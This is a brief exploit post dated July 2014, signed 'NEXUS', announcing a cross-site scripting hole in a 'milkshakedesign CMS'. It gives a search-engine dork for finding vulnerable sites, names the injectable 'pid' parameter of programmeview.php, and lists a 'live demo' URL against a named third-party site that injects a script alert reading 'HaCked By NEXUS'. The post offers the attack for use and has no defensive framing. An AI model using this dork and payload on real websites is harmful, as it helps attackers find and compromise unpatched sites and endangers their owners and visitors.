Thursday, 3 July 2014

milkshakedesign CMS - XSS Vulnerability

Dork:
intext:"Website by Milkshake Design" inurl:"/programmeview.php?pid="

Exploit:
 programmeview.php?pid=

Example & Live Demo:
http://www.optimumtelevision.com/programmeview.php?pid=310%22%3E%3Cscript%3Ealert%28%22HaCked%20By%20NEXUS%20!%22%29%3C/script%3E
NEXUS